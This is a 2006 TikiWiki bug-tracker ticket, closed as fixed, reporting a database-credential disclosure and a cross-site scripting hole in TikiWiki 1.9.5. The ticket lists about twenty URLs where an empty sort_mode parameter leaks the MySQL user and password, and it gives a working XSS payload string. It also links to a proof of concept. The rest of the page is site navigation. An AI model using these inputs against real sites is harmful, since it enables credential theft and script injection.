Fullscreen
[Show/Hide Left Column]
[Show/Hide Right Column]

Tracker Item: Bugs & Wish list Help

Print List Trackers View This Tracker's Items
No Tabs

View Comments (0) Attachments (0)

View Item

Statusclosed closed
Rating -2-1012(1)Help
Ticket ID 927
Subject tikiwiki version 1.9.5 (CVS) -Sirius- mysql password disclosure & xss
Submitted by auditor
Priority 9 high
Category Bug: Error
Tiki Version 1.9.x
2.x
Feature Security
Description there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=

i did install tikiwiki 1.9.5 the 31 october 2006 , i did try this on my dedicated server & in local on my computer .
a proof of concept is disponible here : http://cockor.free.fr/PoC.swf (external link)
there's also a xss here :
/tiki-featured_link.php?type=f&url=" ></iframe>alert('XSS') <!--
regards , securfrog
Solution - fixed for 1.9 CVS
- xss vulnerability fixed

merge into 1.10 on the way
Resolution status (legacy) Fixed
Assigned To Person ohertel
Lastmod by auditor
Created Wednesday 01 November, 2006 17:08:05 UTC
LastModif Wednesday 01 November, 2006 17:52:37 UTC


Main Menu [toggle]


Bugs and Wishes

  1. Report a Bug (or suggest a feature enhancement)

  2. Search Bugs

  3. List yours



About Development

Mailing lists

Extra Stuff

Teams

External Links

Full list of Wiki Pages

TikiWiki on Social Networks


To register [toggle]

To have an account at this site, please register at Tikiwiki.org (external link), and then use that user name and password to log in here.

Search a Wiki Page [toggle]

Exact match

Search Tracker Items Subject [toggle]

Keywords [toggle]

The following is a list of keywords that should serve as hubs for navigation within the Tiki development and should correspond to documentation keywords.

Each feature in Tiki has a wiki page which regroups all the bugs, requests for enhancements, etc. It is somewhat a form of wiki-based project management. You can also express your interest in a feature by adding it to your profile. You can also try out the Dynamic filter.

Accessibility (WAI – 508)
Action log 2.x
Administration
Ajax 2.x
Alert 3.x
Articles & Submissions
Backlinks
Banner
Blog
Bookmark
Browser Compatibility
Calendar
Category
Chat
Comment
Communication Center
Consistency
Contacts Address book
Contact us
Content template
Contribution 2.x
Cookie
Copyright
Custom Home (and Group Home Page)
Database independence
Database MySQL
Date and Time
Debugger Console
Directory (of hyperlinks)
Documentation link from Tiki to doc.tikiwiki.org (Help System)
DogFood
Dynamic Content
Dynamic Variable
External Authentication
FAQ
Featured links
File Gallery
Forum
Friendship Network (Community)
Gmap Google maps
Group
Help System
Hotword
HTML Page
i18n (Multilingual, l10n, Babelfish)
Image Gallery
Import-Export
Install
Integrator
Interaction
Inter-User Messages
InterTiki
jQuery
Karma
Live Support
Lost edit protection
Mail-in
Map with Mapserver
Menu
Meta Tag
Missing features
MindMap 3.x
Mobile Tiki and Voice Tiki
Mods
Module
MultiTiki
MyTiki
Newsletter
Notepad
OS independence (Non-Linux, Windows/IIS, Mac, BSD)
Payment 5.x
Performance Speed / Load / Compression / Cache
Permission
Poll
Profile Manager
Quiz
Rating
RSS
Score
Search engine optimization (SEO)
Search
Security
Semantic links 3.x
Shoutbox
Site Identity
Slideshow
Smarty Template
Spam protection (Anti-bot CATPCHA)
Spellcheck
Spreadsheet
Staging and Approval
Stats
Survey
System log
Tags 2.x
Task
Tell a Friend + Social Bookmarking 2.x
TikiTests 2.x
Theme
Toolbar (Quicktags)
Trackers
TRIM
User Administration
User Files
User Menu
Watch
WebHelp
Webmail and Groupmail
WebServices 3.x
Wiki 3D
Wiki History, page rename, etc
Wiki plugins extends basic syntax
Wiki syntax text area, parser, etc
Wiki structure (book and table of content)
Workspaces 4.x
WYSIWTSN 4.x
WYSIWYCA
WYSIWYG 2.x
XMLRPC

Last Changed Items [toggle]

Last Comments [toggle]

  1. in case the "case" was important
  2. Pixastic Image Processing Library
  3. webfonts.info
  4. pdo_mysql
  5. See also 3029 item

Last Changed Pages [toggle]